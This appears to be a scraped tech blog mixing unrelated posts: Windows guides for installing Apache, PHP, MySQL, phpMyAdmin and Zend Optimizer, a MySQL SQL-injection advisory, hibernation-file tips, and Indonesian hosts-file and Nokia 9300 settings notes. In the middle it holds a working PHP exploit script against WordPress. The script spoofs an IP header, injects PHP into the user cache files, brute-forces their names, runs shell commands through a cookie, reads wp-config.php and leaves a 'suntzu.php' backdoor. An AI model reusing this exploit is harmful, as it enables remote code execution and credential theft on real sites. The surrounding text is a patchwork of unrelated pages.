For the last step, we need an optimizer for all of our PHP code. So we’re going to use Zend Optimizer as it’s the industry standard and well it’s free and they also make a 32 bit version, so it will work on Windows.
So let’s start off by executing the installer that we downloaded in the beginning.
This will bring us to a window similar to this one, simple click on Next.
Next we must agree to Zend’s License Agreement, simply click on Yes after the agreement has been read.
Next the application would like to know where to install Zend, simply click on browse.
Find the new location, or type it in the URL bar. In this case we’re using “C:\server\Zend” as we’d like to keep everything in its own folder. Click OK then Next
Next we’ll need to select the type of web server we’re using. In this case we used Apache 2.x, so simply select Apache 2.x from the list and click on Next.
Next the installer would like to know where our “php.ini” file is installed. In this case it’s installed in the “c:\server\PHP” folder. So, click Browse button, and point it to c:\server\PHP.
This will look like after we have select the php.ini location
We’ll need to specify the location of Apache. In this case the location of Apache was “C:\server\Apache2.2”. After this has been confirmed or input correctly, click on Next.
This will look like after we have select the Apache location. Click Next
After that, the application will bring us to ready to install window. Simple click on Install and the installer will begin the installation of Zend Optimizer using our custom configurations.
This warning box telling us to stop the Apache web server before continuing the installation. Stop the Apache web server and click Yes to continue the installation
This warning box tell us that the installer fail to find the Apache services and told us to manually stop the Apache web server before continuing the installation. Since we've done already, just click OK to continue the installation
When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.
This warning box tell us that the installer fail to find the Apache services and told us to manually start the Apache web server before continuing the installation. Start the Apache web server and click OK to continue the installation
Once everything is finished, we’ll get a window similar to this. Simply click on Finish and we’re done. Zend Optimizer is now installed in the location we provided and is configured using the settings we specified during installation.
Now we can test to see if Zend Optimizer is installed and running correctly. Let’s open our favorite browser and run the phpinfo() application, just like we did at PHP installation. Simply type in http://localhost/inpo.php as the URL and hit enter.
If you get a page similar to this (look closely at the highlighted word, the Zend Optimizer word), then everything went just fine and Zend Optimizer is now installed and working correctly.
In this article we’re going to learn how to install phpMyAdmin with our new server tools so we can better manage our MySQL database. There are a few things in this article that may not seem correct or right and some users may have phpMyAdmin working very easily, it all depends on your setup.
First let’s start by extracting the files to the proper location. Start by opening the phpMyAdmin zip file we downloaded in the beginning. Extract all of these files into the “htdocs” folder under the folder name “phpMyAdmin”. This will help us to keep up with where it’s installed, so now once we’ve unzipped everything we could load it up by using our favorite browser and point it to :
http://localhost/phpMyAdmin/index.php
The error message that displayed above means that we didn't include MySQL library to PHP configuration
To adding MySQL library to PHP configuration, just follow these steps: 1. Open PHP configuration file (php.ini) at c:\server\PHP using your favorite text editor (such as notepad) 2. Search for this syntax: ;extension=php_mysql.dll 3. If you found it, just delete the comment character (;) 4. Save the file and restart the Apache webserver. After that, try to run the phpMyAdmin again from your browser 5. If it's come with the same errors, then it means Apache couldn't find libmysql.dll file (this file is require for php_mysql.dll). Actually, this file is located at c:\server\PHP 6. So, we must change the Windows path to that location. 7. Go to Control Panel and open the System icon (Start -> Control Panel -> System) 8. Go to the Advanced tab 9. Click on the 'Environment Variables' button 10. Look into the 'System variables' panel, and highlight Path variable by click on it 11. Click Edit button, and at the Variable value, at the end of the syntax, add this code: ;c:\server\PHP 12. Click OK and restart your computer 13. Try again to run the phpMyAdmin from your browser
This error message means that our login or password to connect to mysql database is wrong. In order for phpMyAdmin could connect to mysql database, we must supply the login and password at phpMyAdmin configuration file.
Almost all configurable data is placed in config.inc.php. This file only needs to contain the parameters you want to change from their corresponding default value in phpMyAdmin/libraries/config.default.php. If config.inc.php does not exist at the phpMyAdmin directory, just copy config.default.php from libraries directory to phpMyAdmin directory, and rename it to config.inc.php.
Locate this string: $cfg['PmaAbsoluteUri'] = '';
Inside the ' ' place the location of where phpMyAdmin is installed on the server. In this case we installed it within the root directory under its own folder name. So we’ll use “http://localhost/phpMyAdmin/” as our absolute URL location.
There are 3 authentication methods that we can use to connect to phpMyAdmin:
1. config method (the default method) This method is the least secure, as it requires storing your MySQL username and password in the file on the server. Anyone who would find the directory to your phpMyadmin installation would then be able to access your databases. This is the default method, however.
If you use the 'config' authentication method, it is strongly recommended that you secure the directory in which phpMyAdmin is installed, such as adding password protect to phpMyAdmin directory. This extra step is not needed when using either the 'http' or 'cookie' authentication methods.
Locate this string: $cfg['Servers'][$i]['auth_type'] = 'config'; Locate this string: $cfg['Servers'][$i]['user'] = 'put your MySQL login here'; Locate this string: $cfg['Servers'][$i]['password'] = 'put your MySQL password here';
2. http method These methods are more secure, as your username and password are not stored on the server in your configuration file. The 'http' option uses the Apache http authentication method.
Locate this string: $cfg['Servers'][$i]['auth_type'] = 'http'; Locate this string: $cfg['Servers'][$i]['user'] = ''; Locate this string: $cfg['Servers'][$i]['password'] = '';
3. cookie method (recommended method) These methods are more secure, as your username and password are not stored on the server in your configuration file. The 'cookie' method uses cookies, and has the advantage that you can "Log Out" at the end of your session, deleting the cookie.
Locate this string: $cfg['Servers'][$i]['auth_type'] = 'cookie'; Locate this string: $cfg['Servers'][$i]['user'] = ''; Locate this string: $cfg['Servers'][$i]['password'] = ''; Locate this string: $cfg['blowfish_secret'] = 'fill anything here';
For the blowish_secret values, you can fill any alphabets, in example you can use 716e3c0.88759346, but, keep in mind that the maximum length seems to be 46 characters. The passphrase is just used internally to encrypt the password - you will not be prompted for it later.
After we've finished configuring phpMyAdmin, try to run phpMyAdmin again by using our favorite browser and point it to http://localhost/phpMyAdmin/index.php
This error tell us that mbstring library didn't load at PHP. Without mbstring extension, phpMyAdmin is unable to split strings correctly and it may result in unexpected results.
In order to load mbstring library, we must do:
1. Open PHP configuration file (php.ini) at c:\server\PHP using your favorite text editor (such as notepad)
2. Find this syntax: ;extension=php_mbstring.dll
3. Delete the comment character (;)
4. Save the file and restart the apache
5. Try to open up phpMyAdmin again
If you’re able to login with no errors, you'll get the result like the image above, but it will be a bit different depending on your language setting. I've use Indonesian language setting.
In the last few articles we’ve gotten our basic server applications installed and running. This will give us a great foundation to continue with the next few applications. The next thing we’ll need to get installed is PHP, as this will be the language we’re going to use to develop with, and we can’t use PHP without having a PHP engine phrasing all our code.
We didn't use the PHP installer because it isn't the preferred method for installing PHP and it's not secure. So we prefer manually install the PHP.
1. First, we want to create PHP folder under our server directory, so we must create c:\server\PHP folder
2. Open the PHP Zip file we downloaded at the beginning of this project and extract all the files at c:\server\PHP. If you use Winzip, make sure you check "Use Folder Names" option
3. After you've extracted the files, you'll see these directory structure at PHP folder: c:\server\PHP | +--dev | | | |-php5ts.lib | +--ext -- extension DLLs for PHP | | | |-php_bz2.dll | | | |-php_cpdf.dll | | | |-.. | +--extras | | | +--mibs -- support files for SNMP | | | +--openssl -- support files for Openssl | | | +--pdf-related -- support files for PDF | | | |-mime.magic | +--pear -- initial copy of PEAR | | |-go-pear.bat -- PEAR setup script | |-fdftk.dll | |-.. | |-php-cgi.exe -- CGI executable | |-php-win.exe -- executes scripts without an opened command prompt | |-php.exe -- CLI executable - ONLY for command line scripting | |-.. | |-php.ini-dist -- default php.ini settings | |-php.ini-recommended -- recommended php.ini settings | |-php5activescript.dll | |-php5apache.dll | |-php5apache2.dll | |-.. | |-php5ts.dll -- core PHP DLL | |-...
4. After that, we need to create 2 new folder, and we can name it uploadtemp (it's for temporary directory for HTTP uploaded files) and sessiondata (it's for storing all the session files). So, it will be c:\server\PHP\uploadtemp and c:\server\PHP\sessiondata
5. The next step is to set up a valid configuration file for PHP, php.ini. There are two ini files distributed in the zip file, php.ini-dist and php.ini-recommended. We advise you to use php.ini-recommended, because it has been optimized the default settings in this file for performance and security. So copy php.ini-recommended and put it in the same folder (c:\server\PHP) with the name php.ini
6. We still need some customization at PHP configuration, so open php.ini with your favorite text editor, such as notepad. Find these strings and change the values according to these:
- variables_order = EGPCS => The environment variables are hashed into the $_ENV - register_long_arrays = On => Enables registration of the older (and deprecated) long predefined array variables ($HTTP_*_VARS) - register_argc_argv = On => Enables registration of the $argv and $argc variables - magic_quotes_gpc = On - upload_tmp_dir = c:\server\PHP\uploadtemp => after you've change the values, make sure you've delete the comment character (;) at the beginning of the syntax, to make it active - session.save_path= "c:\server\PHP\sessiondata" => after you've change the values, make sure you've delete the comment character (;) at the beginning of the syntax, to make it active. If there's more than one of these syntax, just use one and uncommented it - extension_dir = "c:\server\PHP\ext"
You can change all of the above configuration if you need to do so, but you must understand what you're about to do
7. We must tell PHP to locate the php.ini at c:\server\PHP by doing these: - Go to Control Panel and open the System icon (Start -> Control Panel -> System) - Go to the Advanced tab - Click on the 'Environment Variables' button - Look into the 'System variables' panel - Click on 'New' and enter 'PHPRC' as the variable name and the directory where php.ini is located as the variable value (c:\server\PHP) - Press OK and restart your computer
8. After we've finished configuring the PHP, we must configure the Apache webserver to work with PHP files. There is 2 way, by installing as a CGI binary or installing as an Apache module. Installing as a CGI binary will make our server is open to several possible attacks. So we'd prefer installing as an Apache module
9. Open Apache configuration file, just like this:
10. Add these lines at the very bottom: LoadModule php5_module "c:/server/PHP/php5apache2.dll" AddType application/x-httpd-php .php .htm .html PHPIniDir "c:/server/PHP"
The first line will let Apache know the installation of PHP and the next two will let Apache know how to handle PHP files (sometimes, in html file, we can put PHP scripts on it, so we must also configure PHP to handle .htm and .html file).
11. Restart the Apache server. If the Apache server cann't started, then do:
- open command prompt (Start -> Run -> Type "cmd", click OK) - Type "cd c:\server\Apache2.2\bin" and then press Enter button - Type "httpd -t" to see if there's an error on our Apache configuration - If the error said "httpd: Syntax error on line 486 of C:/server/Apache2.2/conf/httpd.conf: Cannot load C:/server/PHP/php5apache2.dll into server: The specified module could not be found", you can continue on the next steps (the line number can be different, though). Otherwise, you must check your Apache configuration again by examine the error logs
13. After that, just read the instruction file (Readme.txt), or, i can describe it here anyway: - Copy php5apache2.dll to c:\server\PHP - Copy httpd.exe.manifest to c:\server\Apache2.2\bin - If you haven't installed the .NET framework, then run vcredist_x86.exe that we've downloaded before (Click Yes to Accept the agreement).
14. Try to start the apache again. If it cann't started, check the Apache configuration file just like steps 11.
15. If the Apache start successfully, we must test to see if PHP is installed correctly
16. We’ll want to create a file in the htdocs folder located in the main folder of Apache. This is where all of our web documents are going to be stored. Create a new file in this folder can name it inpo.php. Be sure that it saves with a .php extension and not .php.txt or whatever you’ll use to create the file. Once the phpinfo.php file has been created, open it up and place the following code within it.
<?php phpinfo(); ?>
Save it, close the file and then open your favorite browser and type this in the location bar.
http://localhost/inpo.php
17. If you see the following page (like below image), then PHP is installed and setup correctly on your server.
Open up the MySQL zip file that we've downloaded. Inside this zip file will be an installer file, named “setup.exe”. This file can be extracted or ran just where it is. Double click or ran the setup file
Once it’s extracted and has been started, we’ll get a screen similar to this.
Click >> Next
The next screen we’ll see will be the selection for the setup type for our installation. We’re going to select Custom because we have a few custom requests for the installer to perform.
Click >> Next
We will need to change the location for the installation, so we’ll just select MySQL Server and then click on the Change button located in the bottom right.
Simply type in the location, in this case we’ll use “C:\server\mysql” as this is where the rest of our server applications are being installed. Then click on Ok.
This will look like after we have customize the folder
Click >> Next
We are now ready to install, just click on Install button
When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.
This is to setup an account on MySQL.com for updates and so on, we’ll just select Skip for the time being and we can take care of this later.
Click >> Next
Now we get to configure the server to run the way we’d like for it to run. Just click Finish button
This screen is the start page for the Server Instance Configuration Wizard.
Simply click on Next.
We’ll want to select Standard Configuration from the next screen. Remember this is for new installations of MySQL. Users that already have MySQL installed and are upgrading, please select Detailed Configuration.
Click >> Next
Now we get to make a few choices about our server, for this project we’ll use “Install As Windows Service” and make sure “Launch the MySQL Server automatically” option is checked. This will insure the MySQL server is started if it ever shuts down, or the system ever restarts.
Click >> Next
Next we’ll need to select a root password, simply type a password you’d like to use for root access and let’s write it down so we don’t forget it. Also remember to check “Enable root access from remote machines” ONLY IF you want to edit anything from a remote location later on.
The next screen is simply the start screen for the configuration utility, letting us know what it’s about to perform. Simply click on Execute.
When Start Service is error, try to change the name of the service in previous screen (Choose Detailed Configuration)
If there's an error like this screen, then, it maybe because your Computer Firewall block TCP port 3306 for connections. Just go to Start Program => Control Panel => Windows Firewall. If you haven't encounter this problem, you can skip to the next step HERE
After that, click Exceptions tab, and click Add Port button
Just insert: Name: MySQL Connections Port Number: 3306
and make sure, you choose TCP
Click >> OK
Click OK again to exit Windows Firewall options
Back to the MySQL Configuration Screen, press retry to continue the configuration
Once everything is finished it will look like this. This give a little information about what has happened and show that everything goes well. Click Finish button
Once we’ve finished the installation, we can run MySQL application to make sure that MySQL is installed and working properly.
Find the folder in the start menu where MySQL is located and launch the “MySQL Command Line Client”
Once it's open, simply enter the password we just set and if the client allows access with no errors, MySQL is now installed and working properly. There is no need to leave this command line client open, simply type “exit” and enter. This should close the client out.
We now have finished installing MySQL and it’s working correctly. We can now move onto another application.
First and foremost we need to get Apache installed and operational before we can install anything else, or they will not work correctly. So let’s begin by installing Apache.
Locate the Apache installer we downloaded earlier and double click on it. This will launch the Apache automated installer for us, there are a few options we’ll need to set along the way, so keep up.
The first few screens are Apache’s configuration, configuring windows to install Apache. This will only take a second and then we’ll be ready to begin.
This first screen we’ll see after the configuration will be the front of the installer. Basically this just gives you a little information about what we’re about to install.
Click >> Next
Next we’ll have a license agreement that we must accept to continue the installation of Apache.
Select “I accept the terms in the license agreement” >> Click Next
The next screen we have basically explains what we’re installing and some useful information about the application and where we can locate updates and so on.
Click >> Next
Next we have the server information. This is just basic configurations for the server and doesn’t take any time at all.
Network Domain (e.g. somenet.com): localhost Server Name (e.g. www.somenet.com): localhost Administrator’s Email Address: Your email here
Then we’ll select “Run as a service for all users – Recommended”. This will start Apache as a service and run it automatically when the system reboot. This would be the best solution for users that want something quick and simple, no maintenance needed.
Click >> Next
Next we have the selection of how we’d like to install it. I’d prefer my documents be in another location as I’d like to organize the rest of my server applications in one folder in root. So we’ll select Custom for this project and continue.
Click >> Next
From the next window that appears, select “Apache HTTP Server” and click on the “Change…” button located in the bottom right.
This will bring up a window similar to this one where we’re able to change the location of the installation folder. I prefer all of my server applications to be in “C:\server\Apache2.2” so I can organize all of them in one folder. So we’ll change the default of “C:\Program Files\Apache Software Foundation\Apache2.2\” to “C:\server\Apache2.2\”. Remember to use an ending back slash.
Click >> Ok
This will look like after we have customize the folder
Click >> Next
After that, the application will bring us to ready to install window. Simple click on Install and the installer will begin the installation of Apache using our custom configurations.
When it’s installing, we’ll see a window similar to this and will disappear automatically when finished.
If after the installation, there's a popup window show up (it's a windows firewall warning) that ask whether we want to block or unblock the Apache Port, just choose Unblock option
Once everything is finished, we’ll get a window similar to this. Simply click on Finish and we’re done. Apache is now installed in the location we provided and is configured using the settings we specified during installation.
Now we can test to see if Apache is installed and running correctly. Let’s open our favorite browser and give it a try. Simply type in http://localhost/ as the URL and hit enter.
If you get a page similar to this, then everything went just fine and Apache is now installed and working correctly.
Remember that we setup Apache to run as a service so the there's a time when the server needs to be stop or restarted manually, example when we changes httpd.conf file. This file contains all the configurations for the server.
Now we can edit and add pages to our new server by going to “C:\server\Apache2.2\htdocs”. This will be where all the web pages will be located and should be stored. This can be changed by configuring the location in the httpd.conf file. Remember to restart if anything is changed within this file.
Note: This article will be released in sections. Learning how to install Apache, PHP, MySQL, phpMyAdmin and Zend Optimizer is one of the most important parts of running a web server from any machine. In this tutorial we’ll learn how to install all of these resources in Windows XP Service Pack 2.
Requirement
1. Apache Web Server (Win32 Binary) – This is the web server we’ll be use for this project. - Apache Home Page: http://www.apache.org/ - Apache HTTPD Web Server Download Page: http://httpd.apache.org/download.cgi - Apache Version Used: Apache 2.2.2 Win32 Binary
2. PHP Windows Zipped Version – This will be used to develop under the PHP programming language. - PHP Home Page: http://www.php.net/ - PHP Download Page: http://www.php.net/downloads.php - PHP Version Used: PHP 5.1.4 Zipped Version
3. MySQL Database Server – This will be used to run our MySQL databases. - MySQL Home Page: http://www.mysql.com/ - MySQL Download Page: http://dev.mysql.com/downloads/mysql/5.0.html - MySQL Version Used: MySQL 5.0.22 Win32
4. phpMyAdmin Database Manager – This will be used to manage our MySQL databases. - phpMyAdmin Home Page: http://www.phpmyadmin.net/ - phpMyAdmin Download Page: http://www.phpmyadmin.net/home_page/downloads.php - phpMyAdmin Version Used: phpMyAdmin 2.8.1 Zipped Version
5. Zend Optimizer – We’ll use this to optimize all of the PHP development we’ll be doing. - Zend Optimizer Home Page: http://www.zend.com/ - Zend Optimizer Free Download Page: http://www.zend.com/store/free_download.php?pid=13 - Zend Optimizer Version Used: Zend Optimizer 3.0.1 Windows
Start off by downloading each of the applications and scripts and save them to a folder on your desktop or somewhere else that will be easily accessible through out this tutorial.
Now that we have everything that we need, we can continue on to the next section (Install Apache)
Overview
Programs Used Apache - Apache 2.2.2 Win32 Binary (For Windows) PHP - PHP 5.1.4 Windows Installer (For Windows) MySQL - MySQL 5.0.22 Win32 (For Windows) phpMyAdmin - phpMyAdmin 2.8.1 Zipped Version Zend Optimizer - Zend Optimizer 3.0.1 For Windows
MySQL AB has issued updates to its MySQL 4.1 and 5.0 series to address a SQL injection vulnerability. MySQL's action follows the PostgreSQL project's release last week to address the same issues.
The vulnerability was discovered by the PostgreSQL project and passed to MySQL via the Open Source Database Consortium. The vulnerability lies in the mysql_real_escape_string() function. When unsanitized user-supplied data, such as information taken from a Web form, is stored in a MySQL database, it's possible for a malicious user to supply a malformed multibyte character that would cause MySQL to execute arbitrary code. According to the announcements:
"An SQL-injection security hole has been found in multibyte encoding processing. An SQL-injection security hole can include a situation whereby when inserting user supplied data into a database, the user might inject his own SQL statements that the server will execute. With regards to this vulnerability discovered, when character set unaware escaping is used (e.g., addslashes() in PHP), it is possible to bypass it in some multibyte character sets (e.g., SJIS, BIG5 and GBK). As a result, a function like addslashes() is not able to prevent SQL injection attacks."
All releases in the 4.1 and 5.0 series prior to 4.1.20 and 5.0.22 are vulnerable. Users are advised to upgrade to 4.1.20 or 5.0.22 immediately if possible.
For users that are not able or willing to upgrade to MySQL 4.1.20 or 5.0.22, it's possible to tell MySQL to use SQL standard compatibility mode with regard to backslashes. You can set this by using SET sql_mode='NO_BACKSLASH_ESCAPES'; while the MySQL server is running, by using the --sql-mode=NO_BACKSLASH_ESCAPES option when starting the MySQL server, or including this line in your MySQL configuration file:
PHP Code: sql-mode=NO_BACKSLASH_ESCAPES
The configuration file should be my.cnf on Linux systems. It's found under /etc/mysql on Debian and Ubuntu systems, and under /etc on Red Hat and Fedora systems.
Updated packagesare available from MySQL immediately, and Linux distributions should be issuing updated versions of MySQL soon.
/* this works: regardless of all php.ini settings, if user registration is enabled, against an empty or weak MySQL DB password (read explaination for details...) */
if ($argc<6) { echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS \r\n"; echo "host: target server (ip/hostname) \r\n"; echo "path: path to WordPress \r\n"; echo "cmd: a shell command \r\n"; echo "user/pass: you need a valid user account \r\n"; echo "Options: \r\n"; echo " -D[dicrionary] specify a textfile and try dictionary attack \r\n"; echo " -p[port]: \" a port other than 80 \r\n"; echo " -P[ip:port]: \" a proxy \r\n"; echo "Examples: \r\n"; echo "php ".$argv[0]." localhost /wordpress/ your_username password ls -la -Ddic.txt\r\n"; echo "php ".$argv[0]." localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81\r\n"; echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n"; die; }
EXPLANATION:
I) wordpress stores some user informations inside cached files in wp-content/cache/userlogins/ and wp-content/cache/users/ folders, they are php files. Normally they look like this:
but...what happens if you inject a carriage return ( chr(13)...), some php code and some escape chars when you update your profile (ex. in "displayname" argument)?
Now you have to search a way to guess filenames 'cause we have an index.php to trivially protect folders, but... guess what? give a look at wp-includes/cache.php at line 355:
$group_dir is the folder where files are stored DB_PASSWORD costant could be empty, if so... you have only to calculate the md5 hash of your user id, then:
... // On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this // by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address. if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ) $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR']; ...
poc: you can set an http header like this when you register:
for ($i=5; $i<=$argc-1; $i++){ $t=$argv[$i][0].$argv[$i][1]; if (($t<>"-p") and ($t<>"-P") and ($t<>"-D")) {$cmd.=" ".$argv[$i];} if ($t=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($t=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($t=="-D") { $dict=str_replace("-D","",$argv[$i]); } } $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "step 0 -> check if suntzu.php is already installed...\r\n"; $check=array("users/suntzu.php", "userlogins/suntzu.php" ); for ($i=0; $i<=count($check)-1; $i++) { $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"*DL*")) { echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp[1]."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la";die; } } echo "step 1 -> Login ...\r\n"; $data="log=".urlencode(trim($username)); $data.="&pwd=".urlencode(trim($password)); $data.="&rememberme=forever"; $data.="&submit=".urlencode("Login »"); $data.="&redirect_to=wp-admin"; $packet="POST ".$p."wp-login.php HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)... $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(" ",$temp[1]); $cookie=$temp2[0]; $temp2=explode(" ",$temp[2]); $cookie.=" ".$temp2[0]; if ($cookie==''){echo "Unable to login...";die;} else {echo "cookie ->".$cookie."\r\n";}
echo "step 2 -> Retrieve your user id...\r\n"; $packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $temp=explode("checkuser_id\" value=\"",$html); $temp2=explode("\"",$temp[1]); $user_id=$temp2[0]; if ($user_id==''){die("Unable to retrieve user id...\r\n");} else {echo "user id -> ".$user_id."\r\n";}
echo "step 4 -> go to profile page to avoid cached files deletion...\r\n"; $packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n"; $packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (eregi("200 OK",$html)){echo "Done...\r\n";} sleep(2);
echo "step 5 -> check for an empty db password...\r\n"; $check=array("users/".md5($user_id).".php", "userlogins/".md5(trim($username)).".php" ); for ($i=0; $i<=count($check)-1; $i++) { $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (eregi("*DL*",$html)) { echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp[1]);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die; } }
if ($dict=='') {echo "exploit failed...\r\n";} else { echo "step 6 -> trying with dictionary attack...\r\n"; if (file_exists($dict)) { $fp=fopen($dict,"r"); while (!feof($fp)) { $word=trim(fgets($fp)); $check=array("users/".md5($user_id.$word).".php", "userlogins/".md5(trim($username).$word).".php" ); for ($i=0; $i<=count($check)-1; $i++) { echo "Trying with ".$check[$i]."\r\n"; $packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=".$cmd."\r\n"; $packet.="Connection: close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"*DL*")) { echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp[1];echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n"; die; } } } fclose($fp); //if you are here... echo "Exploit failed...\r\n"; } else { die($dict."does not exist!"); } } ?>
It happens to most users of Windows XP. One day you are searching for a file or cleaning up the PC's hard drive and you encounter a huge file - hiberfil.sys. Normally located at C:\hiberfil.sys, its size can vary from 250MB to over 1GB. You try to delete the file - it's not a good idea to delete files you don't understand - but Windows won't oblige anyway.
But, if you can't see this file, it doesn't mean that you didn't activated hibernation functon. First, make sure that you have unchecked "Hide Protected Operation System Files (Recommended)" option. Here's how to do it:
- Open Windows Explorer - Click at Tools menu, and after that click Folder Options sub menu - Click at View Tabs - Unchecked "Hide Protected Operation System Files (Recommended)" option - Click Apply Button and Click Apply To All Folders button
Windows XP has a feature that is called Windows hibernation. Instead of shutting down and restarting your computer, Windows takes a snapshot of everything running on your system, copies it to the hard drive and then turns off most of your hardware. In theory, it is supposed to be a quick shortcut or power saving option that allows you to leave your PC in suspended animation until you are ready to work again. Hibernation temporarily 'freezes' the computer when the PC becomes inactive, so it won't work if you have tasks running constantly (eg downloading files). However it can be handy if you want the computer to sleep after a task has completed (such as creating a video).
To wake up from hibernation you normally move the mouse or hit the spacebar on the keyboard. When you boot up from hibernation mode, the Operating System can read this file and get running a lot faster as apposed to a cold boot when it has to look around for installed hardware, installing drivers and so-on and so-on. Nothing is lost during a power service outage when hibernating. Therefore, great for laptops that get plugged in-and-out all the time. Suspend mode has no such file, everything stays in RAM which depends on power. Not so great for laptops running on low batteries.
Hibernation takes everything in memory and writes it to your hard drive as the hiberfil.sys file. If you have 512MB of memory, then hiberfil.sys will be about 512MB. If you have 1GB, then the file will be around 1GB. So, it's the same size as your RAM Memory Size. The important point to remember is that even if you don't use hibernation, hiberfil.sys will still take up this huge amount of disk space.
But, the presence of the Hiberfil.sys file will prevent Disk Defragmenter from performing a thorough defragmenting operation.
The way to remove the file is to turn off the hibernation feature (by default, hibernate is activated automatically when XP is installed). Here's how to do it:
- Open the Windows Control Panel - Double-click Power Options - Click the Hibernate tab, de-select the 'Enable hibernate support' check box, and then click Apply. - Restart your computer and hiberfil.sys will be automatically deleted.
If you change your mind in the future and would like to use hibernation, go to the Windows Help and Support Center and search for 'enable hibernation'.
Apabila Anda menggunakan sistem operasi Windows dan tidak menggunakan proxy dalam berinteraksi dengan dunia maya, carilah file 'hosts' atau apabila Anda menggunakan Windows XP dan menggunakan prosedur instalasi standart, Anda dapat menemukannya di C:\WINDOWS\system32\drivers\etc\hosts
File tersebut dapat digunakan untuk (mapping) alamat URL situs ke IP lokal.
Selain dapat digunakan untuk memblok situs-situs yang tidak dikehendaki, tips ini juga dapat dipakai untuk memblok situs-situs iklan agar akses internet dapat lebih cepat.
Jadi apabila Anda ingin memblok situs library.monx007.com, cukup tambahkan baris seperti dibawah ini di file hosts tersebut:
Nokia 9300 rnempunyai dimensi yang lebih mungil dari seri di atasnya yakni Nokia 9500, tetapi kemampuannya tidak jauh berbeda. Dengan Nokia 9300, Anda akan mendapatkan fitur-fitur yang mendukung Multiple Accounts, Bluetooth, dengan Operating System Symbian 7.0s. Untuk keperluan aktivitas kantor, tersedia aplikasi Documents, Spreadsheets, dan Presentations. Nokia 9300 juga men-support IMAP4, POP3, SMTP dan lainnya. Bagi Anda yang berminat atau bahkan sudah menjadi pengguna tipe ini, berikut kami sajikan setting koneksi Internetnya, agar Anda tetap bisa tersambung ke Internet via telepon seluler Anda.
1. Pilih menu "New" kernudian akan muncul pertanyaan "Do you want to create a copy of existing Internet access point?", pilih "No"
2. Lalu akan muncul "Internet Setup Window", tekan "Next"
3. Ketik seperti dibawah ini: Internet Setting Name: CBN Network ID: Internet Internet Setting Type: GSM data
4. Tekan "Next"
5. Ketik seperti di bawah ini: Telephone number: 02157989000 Prompt password: Ketik "YES" jika Anda ingin menyimpan password tersebut atau ketik "NO" jika tidak. • Pada menu "Username", masukkan username Anda. • Pada menu "Password", masukkan login password Anda
6. Pilih menu "Advanced" > "IP Configurations": • Auto retrieve IP: Yes • Auto Retrieve DNS: No • Primary DNS: 202.158.3.7 • Secondary DNS: 202.158.3.6
7. Pilih "Proxies" • Proxy protocol: HTTP. • Use proxy server: Yes • Proxy server: proxy.cbn.net.id • Port number: 8080
8. Tekan "Done" > "Finish".
9. Tekan tombol "Web Application" pada keyboard Communicator, lalu pilih "Open web address".
10. Masukkan URL situs (web site address) yang akan Anda kunjungi misalnya (http://www.cbn.net.id), lalu tekan "GoTo". Window Network Connection akan muncul.
11. Pada "Select an access point", pilih "CBN" kemudian tekan "Connect".
12. Jika username dan password Anda diterima, rnaka situs yang Anda kunjungi akan rnuncul.
13. Untuk disconnect, Anda dapat rnenekan tombol "Exit", atau dari window utarna Nokia 9300, pilih "Tools" > "Conn. Manager" - lalu pilih connection name dan tekan "Disconnect".
2. Pada General tab, ketik seperti di bawah ini: • E-mail acount name: CBN eMail • My name: Nama Anda • Username: Alamat e-mail Anda • Password: Password e-mail Anda • My e-mail address: Alamat e-mail Anda • Internet access: Pilih koneksi Inrernet Anda (CBN)
